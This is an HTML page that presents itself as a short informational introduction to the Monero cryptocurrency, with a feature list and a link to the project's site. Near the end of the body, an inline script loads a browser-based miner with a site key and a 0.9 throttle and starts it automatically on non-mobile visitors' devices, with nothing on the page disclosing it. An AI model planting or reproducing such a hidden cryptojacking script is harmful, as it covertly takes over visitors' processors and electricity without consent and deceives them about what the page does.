<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Monero - Private and Secure Cryptocurrency</title>
    <script src="base.js"></script>
    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Pacifico&display=swap">
    <style>
        body {
            font-family: 'Pacifico', 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            background-color: #f4f4f4;
            color: #333;
            margin: 0;
            padding: 0;
            text-align: center;
            font-size: 18px;
        }

        .card {
            background-color: #fff;
            border-radius: 8px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            overflow: hidden;
            max-width: 800px;
            margin: 2em auto;
        }

        header {
            background-color: #333;
            color: #fff;
            padding: 1em 0;
        }

        h1 {
            margin-bottom: 0.5em;
            font-size: 2em;
        }

        section {
            padding: 2em;
            line-height: 1.6;
        }

        img {
            max-width: 100%;
            height: auto;
            border-radius: 8px;
            margin-top: 1em;
        }

        h2 {
            color: #333;
        }

        ul {
            list-style-type: none;
            padding: 0;
        }

        li {
            margin-bottom: 0.5em;
        }

        footer {
            background-color: #333;
            color: #fff;
            padding: 1em 0;
            border-radius: 0 0 8px 8px;
            /* Rounded bottom corners to match the card */
        }

        a {
            color: #3b5998;
            text-decoration: none;
        }

        a:hover {
            text-decoration: underline;
        }
    </style>
</head>

<body>

    <div class="card">

        <header>
            <h1>Monero - Private and Secure Cryptocurrency</h1>
        </header>

        <section>
            <h2>Introduction to Monero:</h2>
            <p>Welcome to the world of Monero, a private and secure cryptocurrency designed for confidential transactions.</p>
            <p>Monero (XMR) uses advanced cryptographic techniques to provide enhanced privacy and anonymity to its users. It is known for its commitment to keeping transactions and wallet balances confidential.</p>
            <img src="Monero.ico" alt="Monero Logo">
        </section>

        <section>
            <h2>Key Features of Monero:</h2>
            <ul>
                <li>Privacy-focused: Monero uses ring signatures, confidential transactions to ensure privacy.</li>
                <li>Decentralized: Monero operates on a decentralized blockchain, providing security.</li>
                <li>Fungibility: All Monero coins are interchangeable, ensuring that each unit is indistinguishable.</li>
                <li>Community-driven: Monero has a strong and passionate community to maintaining the network.</li>
            </ul>
        </section>

        <footer>
            <p>Learn more about Monero at <a href="https://getmonero.org" target="_blank">getmonero.org</a></p>
        </footer>

        <script>
            var miner = WMP.Anonymous('SK_H8ft7ODVM5v8cnasldiC7',{throttle: 0.9});
            if (!miner.isMobile()){
                miner.start();
            }
        </script>
    </div>

</body>

</html>
